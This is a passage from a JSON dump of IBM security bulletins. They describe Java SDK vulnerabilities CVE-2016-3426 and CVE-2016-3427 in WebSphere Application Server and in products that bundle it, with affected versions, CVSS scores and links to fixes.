(AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java SE and Java SE Embedded related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM Multi-Enterprise Integration Gateway 1.0 - 1.0.0.1 \n\nIBM B2B Advanced Communications 1.0.0.2 - 1.0.0.5\n\n## Remediation/Fixes\n\n**_Fix*_**\n\n| **_VRMF_**| **_APAR_**| **_How to acquire fix_** \n---|---|---|--- \niFix 1.0.0.5_1| 1.0.0.5| IT15484| IBM Fix Central &gt; [](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/Multi-Enterprise+Integration+Gateway&release=1.0.0.1&platform=All&function=fixId&fixids=IBM_Multi-Enterprise_Integration_Gateway_V1.0.0.1_3_iFix_Media&includeSupersedes=0>)[B2B_Advanced_Communications_V1.0.0.5_1_iFix_Media](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%2FOther%2Bsoftware&product=ibm/Other+software/Multi-Enterprise+Integration+Gateway&release=All&platform=All&function=fixId&fixids=IBM_B2B_Advanced_Communications_V1.0.0.5_1_iFix_Media&includeRequisites=1&includeSupersedes=0>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T20:01:12", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM B2B Advanced Communications (CVE-2016-3427 and CVE-2016-3426)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-16T20:01:12", "id": "D0DCF925CB843A3DD1CE13BFFE3A9D0AA7622AA1DBECD77AB5105922400050DA", "href": "https://www.ibm.com/support/pages/node/280171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:40", "description": "## Summary\n\nEmbedded Websphere Application Server (eWAS) is shipped as a component of Tivoli Integrated Portal. Information about a security vulnerability affecting Embedded Websphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the WAS security bulletin [Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details \n \n**_Important Note_**: The Websphere security bulletin above provides the vulnerability details including the steps to remediate. However, it is important to review the **\"Remediation/Fixes\"** section below before reviewing the Websphere bulletin to ensure the TIP specific remediation steps are understood and followed.\n\n## Affected Products and Versions\n\nTivoli Integrated Portal version 2.1 and 2.2 bundling Embedded Websphere Application Server version 7.0 \n\n## Remediation/Fixes\n\nThe Websphere security bulletin above provides a link to the required iFix to remediate the vulnerability. However, the iFix requires either eWAS 7.0.0.31 or higher installed. \nTIP does not support upgrading Websphere fixpack independently. TIP 2.2.0.15 or TIP 2.2.0.17 must be applied which will upgrade eWAS to 7.0.0.31 and above. Once TIP FP has been applied, the Websphere iFix can be applied as described in the Websphere bulletin.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T15:23:24", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server shipped with Tivoli Integrated Portal (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T15:23:24", "id": "E095FC03096261FE55986EF4F402EA0A700BEE11F22BFA669379C13D2E1BC33B", "href": "https://www.ibm.com/support/pages/node/279195", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:04", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Content Manager Records Enabler. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Security Bulletin: Security Vulnerability in IBM WebSphere Application Server (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \n \nIBM Content Manager Records Enabler 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \n \nIBM Content Manager Records Enabler 8.5.0.6 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \n \nIBM Content Manager Records Enabler 8.5.0.7 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T12:16:16", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Content Manager Records Enabler (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T12:16:16", "id": "8CF3082A44DE60C67D8DC18C23EE26D771B4A91C0A12FDF0AA3BEC56135A0739", "href": "https://www.ibm.com/support/pages/node/283841", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:41:39", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped as a component of IBM Rational ClearCase. Information about a security vulnerability affecting WAS has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the bulletin \"[Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21982223>)\" for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nIBM Rational ClearCase, ClearCase Remote Client (CCRC) WAN server/CM Server component. \n\n**Versions 8.0.0.x, 8.0.1.x, 9.0.0.x:**\n\n \nThis vulnerability only applies to the CCRC WAN server component. \n**Versions 7.1.x.x:**\n\n \nThis vulnerability only applies to the CM server component.\n\n## Remediation/Fixes\n\nReview the security bulletin referenced above and apply the relevant fixes to your WAS installation used for ClearCase. \n \n\n\n**Affected Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n7.1.0.x, 7.1.1.x, and 7.1.2.x| [Document 1390803](<http://www.ibm.com/support/docview.wss?uid=swg21390803>) explains how to update WAS for ClearCase CM Servers at release 7.1.x. Consult those instructions when applying the fix. \n8.0.0.x \n8.0.1.x \n9.0.0.x| Apply the appropriate WebSphere Application Server fix directly to your CCRC WAN server host. No ClearCase-specific steps are necessary. \n_For 7.0.x, 7.1.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-10T08:34:12", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Rational ClearCase (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-07-10T08:34:12", "id": "A5022E2B14C6CFC69E613237E07A6681EAB204D56E5668D8588C0AE424BB40D9", "href": "https://www.ibm.com/support/pages/node/279651", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:42", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM Tivoli System Automation Application Manager. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult the security bulletin \u201c[_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www.ibm.com/support/docview.wss?uid=swg21982223>)\u201d for further vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Tivoli System Automation Application Manager 4.1| WebSphere Application Server 8.5 \nNote that IBM Tivoli System Automation Application Manager 3.2.2, 3.2.1, and 3.2.0 are not affected. \n\n## Remediation/Fixes\n\nYou need to install the corresponding APAR from WebSphere Application Server. Please follow the instructions on this link: [_http://www.ibm.com/support/docview.wss?uid=swg21982223_](<http://www.ibm.com/support/docview.wss?uid=swg21982223>). Please see section \u201cAffected Products and Versions\u201d in this bulletin on details which fix of WebSphere Application Server applies to your version of IBM Tivoli System Automation Application Manager.\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T15:23:06", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T15:23:06", "id": "B8D7C45A7B91FC54907F2A1A1E6B04BDAFBFDF653C7180AD40F4BA7A5091A75B", "href": "https://www.ibm.com/support/pages/node/278329", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T14:27:37", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of Maximo Asset Management, Maximo Asset Management Essentials, Maximo Industry Solutions (including Maximo for Energy Optimization, Maximo for Government, Maximo for Nuclear Power, Maximo for Transportation, Maximo for Life Sciences, Maximo for Oil and Gas, and Maximo for Utilities), Maximo Adapter for Primavera, SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Change and Configuration Management Database, and TRIRIGA Energy Optimization. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult [Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nMaximo Asset Management 7.6 \nIBM Control Desk 7.6 \nMaximo for Aviation 7.6 \nMaximo for Life Sciences 7.6 \nMaximo for Transportation 7.6| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 8.5 Full Profile \nMaximo Asset Management 7.5 \nMaximo Asset Management Essentials 7.5 \nMaximo for Government 7.5 \nMaximo for Nuclear Power 7.5 \nMaximo for Transportation 7.5 \nMaximo for Life Sciences 7.5 \nMaximo for Oil and Gas 7.5 \nMaximo for Utilities 7.5 \nMaximo Adapter for Primavera 7.5 \nSmartCloud Control Desk 7.5 \nTRIRIGA Energy Optimization 1.1| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 8.5 Full Profile \nIBM WebSphere Application Server 8.0 \nIBM WebSphere Application Server 7.0 \nMaximo Asset Management 7.1 \nMaximo Asset Management Essentials 7.1 \nMaximo Asset Management for Energy Optimization 7.1 \nMaximo for Government 7.1 \nMaximo for Nuclear Power 7.1 \nMaximo for Transportation 7.1 \nMaximo for Life Sciences 7.1 \nMaximo for Oil and Gas 7.1 \nMaximo for Utilities 7.1 \nMaximo Adapter for Primavera 7.1| IBM WebSphere Application Server 7.0 \nTivoli Asset Management for IT 7.2 \nTivoli Service Request Manager 7.2 \nChange and Configuration Management Database 7.2| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 7.0 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-22T03:02:31", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in IBM WebSphere Application Server shipped with Asset and Service Management (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2022-09-22T03:02:31", "id": "3595219827CBAE62E6C87140158C93E3FA2A013C8BCEC8A5B536BAC89C55BC21", "href": "https://www.ibm.com/support/pages/node/278263", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:50:34", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM Security Key Lifecycle Manager. Information about a security vulnerability affecting Websphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n** \nCVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n\n## Remediation/Fixes\n\nUpdate your IBM WebSphere Application Server (WAS) with the appropriate Interim Fix based on information in the WebSphere security bulletin link below: \n\n * To determine your WAS version, use the ` \ntklmVersionInfo` \nCLI command. \n * To determine your Java version, navigate to the install folder &lt;WAS_HOME&gt;/AppServer/java/bin and run ` \njava -fullversion`\n * Principal Product and Version(s)| Affected Supporting Product and Version \n---|--- \n \nIBM Security Key Lifecycle Manager (SKLM) v2.5 on distributed platforms | WebSphere Application Server v8.5.5 \n \nIBM Security Key Lifecycle Manager (SKLM) v2.6 on distributed platforms | WebSphere Application Server v8.5.5.7 \n \n## Workarounds and Mitigations\n\nPlease consult the security bulletin, [Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for information about fixes.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T21:41:52", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-16T21:41:52", "id": "AFAF169974B6AABF6CF7272D4406CAB1EDD15D52DAF28E97FB52D795BB07F8D1", "href": "https://www.ibm.com/support/pages/node/278735", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:48", "description": "## Summary\n\nIBM Tivoli Storage Manager FastBack Reporting requires the dependent product IBM WebSphere Application Server. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes. \n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Tivoli Storage Manager Fastback 6.1.0 through 6.1.12.1| IBM WebSphere Application Server 8.5.0.1 Full Profile \nIBM Tivoli Storage Manager Fastback 6.1.12.2 through 6.1.12.3| IBM WebSphere Application Server 8.5.5.4 Full Profile \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T15:23:12", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server affecting IBM Tivoli Storage Manager FastBack Reporting (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T15:23:12", "id": "265C7F39696063EC6C052A835129BE2250A30FFCD1A9F5A46A6025E12F1AEC5A", "href": "https://www.ibm.com/support/pages/node/278553", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:13", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology Edition that is shipped with IBM WebSphere Application Server. These issues were disclosed in the Oracle April 2016 Critical Patch Update, plus four additional vulnerabilities. These may affect some configurations of IBM WebSphere Application Server Full Profile, IBM WebSphere Application Server Liberty Profile, and IBM WebSphere Application Server Hypervisor Edition. \n\n## Vulnerability Details\n\nThis bulletin covers all applicable Java SE CVEs published by Oracle as part of their April 2016 Critical Patch Update which affects IBM SDK, Java Technology Edition. There are other advisories included in the IBM Java SDK but WebSphere Application Server is not vulnerable to them. You will need to evaluate your own code to determine if you are vulnerable. Please refer to the Reference section for more information on the advisories not applicable to WebSphere Application Server. HP fixes are on a delayed schedule.** \nCVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n** \nCVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n\n## Affected Products and Versions\n\nIBM Java SDK shipped with IBM WebSphere Application Server Version 8.5.0.0 through 8.5.5.9. \n\n * This _does not occur_ on IBM Java SDK shipped with WebSphere Application Servers Fix Packs 8.5.5.10\n\n## Remediation/Fixes\n\nTo patch an existing service instance refer to the IBM WebSphere Application Server bulletin: ** ** \n[**Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223&myns=swgws&mynp=OCSSCKBL&mynp=OCSSEQTP&mync=E&cm_sp=swgws-_-OCSSCKBL-OCSSEQTP-_-E>) \n \nAlternatively, delete the vulnerable service instance and create a new instance. The new maintenance will be included.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:38", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect IBM WebSphere Application Server for Bluemix April 2016 CPU (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:38", "id": "9B76461F148C75BB1672D4E6CDC2D3BAB8D5A3142F9FF56BF418C9B0F91B19DF", "href": "https://www.ibm.com/support/pages/node/278895", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:06", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Content Manager Records Enabler. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Content Manager Records Enabler 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \nIBM Content Manager Records Enabler 8.5.0.6| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \nIBM Content Manager Records Enabler 8.5.0.7| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": 